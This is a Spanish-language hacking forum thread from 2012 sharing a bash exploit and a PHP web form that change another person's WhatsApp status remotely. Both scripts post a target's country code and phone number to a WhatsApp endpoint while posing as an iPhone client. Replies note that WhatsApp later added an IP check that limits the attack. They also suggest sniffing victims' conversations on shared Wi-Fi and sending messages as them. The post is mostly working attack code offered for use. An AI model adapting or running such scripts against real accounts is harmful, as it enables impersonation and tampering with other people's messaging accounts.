Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: el-brujo en 20 Enero 2012, 23:10 pm



Título: WhatsApp Status Changer v0.2 Exploit
Publicado por: el-brujo en 20 Enero 2012, 23:10 pm
Código
  1. #!/bin/bash
  2. #
  3. # WhatsApp Status changer v0.2 stable
  4. # A slim exploit able to change the WhatsApp
  5. # user status in a remote way.
  6. #
  7. # This program is released under the terms of the GNU General Public License
  8. # (GPL), which is distributed with this software in the file "COPYING".
  9. # The GPL specifies the terms under which users may copy and use this software.
  10. #
  11.  
  12. show_help(){
  13.  echo ""
  14.  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  15.  echo ""
  16.  echo " --usage    show the exploit Usage"
  17.  echo " --credits  show the exploit Credits"
  18.  echo " --help     show the Help"
  19.  echo ""
  20.  echo " enJoy"
  21. }
  22.  
  23. show_credits(){
  24.  echo ""
  25.  echo " Emanuele Gentili"
  26.  echo " http://www.emanuelegentili.eu"
  27.  echo " eg @ offensive-security.it"
  28.  echo ""
  29.  echo " Stefano Fratepietro"
  30.  echo " http://steve.deftlinux.net"
  31.  echo " stefano @ deftlinux.net"
  32.  echo ""
  33.  
  34. }
  35.  
  36. show_usage(){
  37.  echo ""
  38.  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  39.  echo ""
  40.  echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  41.  echo ""
  42.  echo " enJoy"
  43. }
  44.  
  45.  
  46. # Bash
  47. while [[ $# != 0 ]]; do
  48.    arg_name=$1; shift
  49.    case "$arg_name" in
  50.      --help|-?|-h) show_help; exit 0;;
  51.      --credits) show_credits; exit 0;;
  52.      --usage) show_usage; exit 0;;
  53.      --countrycode) countrycode=$1; shift;;
  54.      --mobilenum) mobilenum=$2; shift;;
  55.      --text) text=$3; shift;;
  56.      *) echo "invalid option: $1"; show_help;exit 1;;
  57.    esac
  58. done
  59.  
  60. [ -z "$countrycode" ] && { show_help; exit 1; }
  61.  
  62. whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
  63.  
  64. wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
  65.  
  66. echo ""
  67. echo "[+] Operazione completata."
  68. echo ""


http://www.exploit-db.com/exploits/18396/

PHP

Código
  1. <form method="post">
  2.  
  3.    <dl>
  4.        <dt>Country code: (example: 31)</dt>
  5.        <dd><input type="text" name="cc" value="31" /></dd>
  6.        <dt>Phonenumber: (example: +31612345678)</dt>
  7.        <dd><input type="text" name="n" value="+316" /></dd>
  8.        <dt>New status:</dt>
  9.        <dd><input type="text" name="m" /></dd>
  10.        <dd><input type="submit" value="Change!" /></dd>
  11.    </dl>
  12.  
  13. </form>
  14.  
  15. <?php
  16. ini_set('display_errors',0);
  17. error_reporting(E_ALL|E_STRICT);
  18.  
  19. if ( $_SERVER['REQUEST_METHOD'] === 'POST' )
  20. {
  21.    $url = 'https://s.whatsapp.net/client/iphone/u.php';
  22.    $fields = array(
  23.        'cc' => urlencode($_POST['cc']),
  24.        'me' => urlencode($_POST['n']),
  25.        's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
  26.    );
  27.  
  28.    //url-ify the data for the POST
  29.    foreach ($fields as $key=>$value) {
  30.        $fields_string .= $key . '=' . $value . '&';
  31.    }
  32.    rtrim($fields_string, '&');
  33.  
  34.    //open connection
  35.    $ch = curl_init();
  36.  
  37.    //set the url, number of POST vars, POST data
  38.    curl_setopt($ch, CURLOPT_URL, $url);
  39.    curl_setopt($ch, CURLOPT_POST, count($fields));
  40.    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  41.    curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
  42.  
  43.    //execute post
  44.    $result = curl_exec($ch);
  45.  
  46.    //close connection
  47.    curl_close($ch);
  48.  
  49. }
  50. ?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/


Título: Re: WhatsApp Status Changer v0.2 Exploit
Publicado por: AlbertoBSD en 21 Enero 2012, 04:42 am
Con tantos usuarios usando whatapp en la misma Wifi todavia es posible. Asi mismo es posible sniffear sus conversaciones y enviar mensajes con su mismo usuario.

Saludos


Título: Re: WhatsApp Status Changer v0.2 Exploit
Publicado por: d3xf4ult en 24 Enero 2012, 09:03 am
Con tantos usuarios usando whatapp en la misma Wifi todavia es posible. Asi mismo es posible sniffear sus conversaciones y enviar mensajes con su mismo usuario.

Saludos

Pero no era que a partir de la versión 2.6 o 2.7.1528 (creo que es la actual) WhatsApp cifra las conexiones. De hecho lo podeis comprobar:
Conectar el móvil al PC si los historiales de conversaciones y contactatos se guardan en la memoria microSD ir a: WhatsApp\Databses\ y ahí lod ficheros ".db.crypt".
Intentar abrirlos con SQLIte, por ejemplo, y nada... las conversaciones, números y contactos están cifrados. Con lo cual, ya no podemos enviar mensajes con el mismo usuario (aunque esto no estoy seguro... por que nosé si podrás capturar paquetes snifados, modificarlos y volver injectarlos) y capturar tráfico se captura pero cifrado.

Alguién sabe que tipo de cifrado utiliza?

-Saludos-